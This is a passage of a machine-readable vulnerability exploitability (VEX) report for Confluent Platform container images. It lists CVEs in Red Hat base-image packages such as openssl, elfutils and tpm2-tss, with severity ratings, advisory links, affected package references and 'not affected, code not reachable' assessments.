        {
          "url": "https://bugzilla.redhat.com/2359930"
        },
        {
          "url": "https://bugzilla.redhat.com/2359932"
        },
        {
          "url": "https://bugzilla.redhat.com/2359934"
        },
        {
          "url": "https://bugzilla.redhat.com/2359938"
        },
        {
          "url": "https://bugzilla.redhat.com/2359940"
        },
        {
          "url": "https://bugzilla.redhat.com/2359943"
        },
        {
          "url": "https://bugzilla.redhat.com/2359944"
        },
        {
          "url": "https://bugzilla.redhat.com/2359945"
        },
        {
          "url": "https://bugzilla.redhat.com/2359947"
        },
        {
          "url": "https://bugzilla.redhat.com/2359950"
        },
        {
          "url": "https://bugzilla.redhat.com/2359963"
        },
        {
          "url": "https://bugzilla.redhat.com/2359964"
        },
        {
          "url": "https://bugzilla.redhat.com/2359972"
        },
        {
          "url": "https://bugzilla.redhat.com/2370920"
        },
        {
          "url": "https://bugzilla.redhat.com/2380264"
        },
        {
          "url": "https://bugzilla.redhat.com/2380273"
        },
        {
          "url": "https://bugzilla.redhat.com/2380274"
        },
        {
          "url": "https://bugzilla.redhat.com/2380278"
        },
        {
          "url": "https://bugzilla.redhat.com/2380280"
        },
        {
          "url": "https://bugzilla.redhat.com/2380283"
        },
        {
          "url": "https://bugzilla.redhat.com/2380284"
        },
        {
          "url": "https://bugzilla.redhat.com/2380290"
        },
        {
          "url": "https://bugzilla.redhat.com/2380291"
        },
        {
          "url": "https://bugzilla.redhat.com/2380295"
        },
        {
          "url": "https://bugzilla.redhat.com/2380298"
        },
        {
          "url": "https://bugzilla.redhat.com/2380306"
        },
        {
          "url": "https://bugzilla.redhat.com/2380308"
        },
        {
          "url": "https://bugzilla.redhat.com/2380309"
        },
        {
          "url": "https://bugzilla.redhat.com/2380310"
        },
        {
          "url": "https://bugzilla.redhat.com/2380312"
        },
        {
          "url": "https://bugzilla.redhat.com/2380313"
        },
        {
          "url": "https://bugzilla.redhat.com/2380320"
        },
        {
          "url": "https://bugzilla.redhat.com/2380321"
        },
        {
          "url": "https://bugzilla.redhat.com/2380322"
        },
        {
          "url": "https://bugzilla.redhat.com/2380326"
        },
        {
          "url": "https://bugzilla.redhat.com/2380327"
        },
        {
          "url": "https://bugzilla.redhat.com/2380334"
        },
        {
          "url": "https://bugzilla.redhat.com/2380335"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2338999"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359895"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359899"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359902"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359903"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359911"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359918"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359920"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359924"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359928"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359930"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359934"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359938"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359940"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359943"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359944"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359945"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359947"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359950"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359963"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359964"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359972"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370920"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380264"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380273"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380274"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380278"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380280"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380283"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380290"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380298"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380306"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380308"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380309"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380310"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380312"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380313"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380320"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380321"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380322"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380326"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380327"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380334"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380335"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13176"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21574"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21575"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21577"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21579"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21580"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21581"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21584"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21585"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30681"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30682"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30683"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30684"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30685"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30687"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30688"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30689"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30693"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30695"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30696"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30699"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30703"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30704"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30705"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30715"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30721"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30722"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50077"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50078"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50079"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50080"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50081"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50082"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50083"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50084"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50085"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50086"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50087"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50088"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50091"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50092"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50093"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50094"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50096"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50097"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50098"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50099"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50100"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50101"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50102"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50104"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5399"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-16046.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:15699"
        },
        {
          "url": "https://github.com/advisories/GHSA-r9fv-h47r-823f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/07272b05b04836a762b4baa874958af51d513844"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2af62e74fb59bc469506bc37eb2990ea408d9467"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/392dcb336405a0c94486aa6655057f59fd3a0902"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4b1cb94a734a7d4ec363ac0a215a25c181e11f65"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/77c608f4c8857e63e98e66444e2e761c9627916f"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/0d5fd1ab987f7571e2c955d8d8b638fc0fb54ded"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/a2639000db19878d5d89586ae7b725080592ae86"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-13176.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-16046.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13176"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20250120.txt"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0005"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0005/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250418-0010"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250418-0010/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250502-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250502-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7264-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7278-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2025.html#AppendixMSQL"
        }
      ],
      "published": "2025-01-20T14:15:26+00:00",
      "updated": "2026-06-17T07:01:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-25260",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "elfutils v0.189 was discovered to contain a NULL pointer dereference via the handle_verdef() function at readelf.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-25260"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-25260"
        },
        {
          "url": "https://github.com/schsiung/fuzzer_issues/issues/1"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25260"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=31058"
        },
        {
          "url": "https://sourceware.org/elfutils/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-25260"
        }
      ],
      "published": "2024-02-20T18:15:52+00:00",
      "updated": "2026-06-17T07:15:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-29040",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        502
      ],
      "description": "This repository hosts source code implementing the Trusted Computing Group's (TCG) TPM2 Software Stack (TSS). The JSON Quote Info returned by Fapi_Quote has to be deserialized by Fapi_VerifyQuote to the TPM Structure `TPMS_ATTEST`. For the field `TPM2_GENERATED magic` of this structure any number can be used in the JSON structure. The verifier can receive a state which does not represent the actual, possibly malicious state of the device under test. The malicious device might get access to data it shouldn't, or can use services it shouldn't be able to. This \nissue has been patched in version 4.1.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-29040"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-29040"
        },
        {
          "url": "https://github.com/tpm2-software/tpm2-tss/commit/710cd0b6adf3a063f34a8e92da46df7a107d9a99"
        },
        {
          "url": "https://github.com/tpm2-software/tpm2-tss/releases/tag/4.1.0"
        },
        {
          "url": "https://github.com/tpm2-software/tpm2-tss/security/advisories/GHSA-837m-jw3m-h9p6"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EFR7SVEWCOXORHPCLLGXEMHFMIGG2MFE/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GI4JFEZBKQQUPJ4RWK6IHEWXAFCEJDPI/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29040"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6796-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-29040"
        }
      ],
      "published": "2024-06-28T21:15:02+00:00",
      "updated": "2026-06-17T07:22:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.2.3-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-41996",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        295
      ],
      "description": "Validating the order of the public keys in the Diffie-Hellman Key Agreement Protocol, when an approved safe prime is used, allows remote attackers (from the client side) to trigger unnecessarily expensive server-side DHE modular-exponentiation calculations. The client may cause asymmetric resource consumption. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE and validate the order of the public key.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-41996"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-41996"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-089022.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html"
        },
        {
          "url": "https://dheatattack.gitlab.io/details/"
        },
        {
          "url": "https://dheatattack.gitlab.io/faq/"
        },
        {
          "url": "https://gist.github.com/c0r0n3r/abccc14d4d96c0442f3a77fa5ca255d1"
        },
        {
          "url": "https://github.com/openssl/openssl/issues/17374"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41996"
        },
        {
          "url": "https://openssl-library.org/post/2022-10-21-tls-groups-configuration/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-41996"
        }
      ],
      "published": "2024-08-26T06:15:04+00:00",
      "updated": "2026-06-17T07:48:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
